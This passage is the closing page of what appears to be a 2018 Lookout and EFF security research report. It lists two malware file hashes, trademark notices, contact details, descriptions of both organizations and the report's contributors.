1390f581a75a0f8f8eb200a283437bed48f30ae9d5616e94f64acfd93c12fcef987a PE32 executable (GUI) Intel 80386
1391d57701321f2f13585a02fc8ba6cbf1f2f094764bfa067eb73c0101060289b0ba PE32 executable (GUI) Intel 80386
1392SECURITY RESEARCH REPORT
1393 49
13941-888-988-5795 | lookout.com
1395© 2018 Lookout, Inc. LOOKOUT®
1396, the Lookout Shield Design®
1397, LOOKOUT with Shield Design®
1398, SCREAM®
1399, and SIGNAL FLARE® are registered trademarks of Lookout, Inc.
1400in the United States and other countries. EVERYTHING IS OK®
1401, LOOKOUT MOBILE SECURITY®
1402, and PROTECTED BY LOOKOUT®
1403, are registered trademarks of Lookout,
1404Inc. in the United States. POWERED BY LOOKOUTâ„¢ is a trademark of Lookout, Inc. All other brand and product names are trademarks or registered trademarks of their
1405respective holders. 20180118-Lookout-USv1.0
1406Lookout Website
1407www.lookout.com
1408Blog
1409blog.lookout.com
1410Email
1411threatintel@lookout.com
1412Twitter
1413@lookout
1414EFF Website
1415www.eff.org
1416Blog
1417www.eff.org/deeplinks
1418Email
1419press@eff.org
1420Twitter
1421@eff
1422About Lookout
1423Lookout is a cybersecurity company for a world run by apps.
1424Powered by the largest dataset of mobile code in existence,
1425Lookout is the security platform of record for mobile device
1426integrity and data access. Lookout is trusted by hundreds
1427of millions of individuals, hundreds of enterprises and
1428government agencies, and such ecosystem partners as AT&T,
1429Deutsche Telekom, and Microsoft. Headquartered in San
1430Francisco, Lookout has offices in Amsterdam, Boston, London,
1431Sydney, Tokyo, Toronto and Washington, D.C.
1432About EFF
1433The Electronic Frontier Foundation is the leading nonprofit
1434organization defending civil liberties in the digital world.
1435Founded in 1990, EFF champions user privacy, free expression,
1436and innovation through impact litigation, policy analysis,
1437grassroots activism, and technology development. We work to
1438ensure that rights and freedoms are enhanced and protected as
1439our use of technology grows.
1440Contributors
1441Andrew Blaich, Lookout
1442Apurva Kumar, Lookout
1443Jeremy Richards, Lookout
1444Michael Flossman, Lookout
1445Cooper Quintin, EFF
1446Eva Galperin, EFF
1447Special thanks to the many others in our organization, and to our
1448partners, who contributed significantly to this work.